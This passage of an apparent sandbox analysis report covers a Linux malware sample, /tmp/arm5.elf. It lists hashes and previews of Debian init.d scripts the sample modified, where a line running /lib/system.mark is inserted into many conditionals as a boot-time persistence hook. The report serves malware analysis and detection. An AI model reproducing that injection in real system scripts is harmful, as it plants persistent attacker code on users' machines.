Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.911228479541638
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
MD5:	17D2C5E15246E822C28D957F063D1A16
SHA1:	387E38EC5877238778209A18EA0D930709E7A603
SHA-256:	25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
SHA-512:	0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.284950933277381
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
MD5:	8134B3B7E43D4BBE6C1F3E7C7C73A7ED
SHA1:	156CCD1CF7176156A0AD84CDEB5B53868C81712F
SHA-256:	379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
SHA-512:	7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
Malicious:	true
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.104600839303824
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
MD5:	4F5481561C2CB414FA79507BA03FDEF7
SHA1:	974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
SHA-256:	B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
SHA-512:	20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.317046519159889
Encrypted:	false
SSDEEP:	12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
MD5:	1BB719CD6C1AFE11FFAA22E457222B8B
SHA1:	8C6D68B8CFD06AD81813E9568F61C029F12D258A
SHA-256:	282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
SHA-512:	23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.328823038467521
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
MD5:	70A5C40B509AEA9932FA851AD70ACB57
SHA1:	463305EFCF59020D68D1E2111298EE20612D0D73
SHA-256:	04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
SHA-512:	E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.319082661316184
Encrypted:	false
SSDEEP:	48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
MD5:	FA339A7172040C330DC30E65E29BE1D1
SHA1:	F558AD0D3435E5F9E486820B9844031CF83450B1
SHA-256:	7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
SHA-512:	C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.114269594803135
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
MD5:	B48EB035141800F7976971DFDB30D671
SHA1:	18D8B59AD64232DEBB186270DA8172D0C1DE47A8
SHA-256:	E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
SHA-512:	7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.866964949464276
Encrypted:	false
SSDEEP:	48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
MD5:	97AC49C2355ACB94890353EE4381A945
SHA1:	D847EF688D5785E54FB463C2E00B0922BA0E4060
SHA-256:	86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
SHA-512:	FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.307601355730172
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
MD5:	0F6B71C6CC119B9DDB34511BD4CF6A49
SHA1:	F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
SHA-256:	6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
SHA-512:	EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.281955883729912
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
MD5:	F42950D3F937B049D8ECC88A59A65CA3
SHA1:	E74080DDEE0664F4069E7558C68D2795B752DC55
SHA-256:	6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
SHA-512:	15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.254527998623176
Encrypted:	false
SSDEEP:	12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	CBFDB92FECA62D963DF3A25F15C3E88D
SHA1:	14A84AD6ACD0DDD5777C86FAC10894212CE44F57
SHA-256:	84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
SHA-512:	1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
Malicious:	true
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.255106060955411
Encrypted:	false
SSDEEP:	96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
MD5:	4D1E075A3D6AB76CE7754595802D6C77
SHA1:	F44434087B007BABB314B8277FFC731930DF0A13
SHA-256:	5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
SHA-512:	59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.277181564959481
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
MD5:	816DFAE328401DBA31A79591D3EBC3F2
SHA1:	C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
SHA-256:	72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
SHA-512:	62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.008592969018552
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
MD5:	0F06F605D05EA59E83CFDB744A720668
SHA1:	ED458D2DC1CF9F7EEACF612295016DD4C67FA431
SHA-256:	1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
SHA-512:	B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.012565313964516
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
MD5:	8EFA67FAE6C01453D5F673251C44E223
SHA1:	ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
SHA-256:	48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
SHA-512:	306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.743587167790472
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
MD5:	5D4D9388F89B176957FDD414AF0D3385
SHA1:	206408E65660EFF14DE046FBECC38DDA2BCD403F
SHA-256:	9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
SHA-512:	CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.078291501927291
Encrypted:	false
SSDEEP:	96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
MD5:	53996396D16C98D4AF1BF71D33AE801F
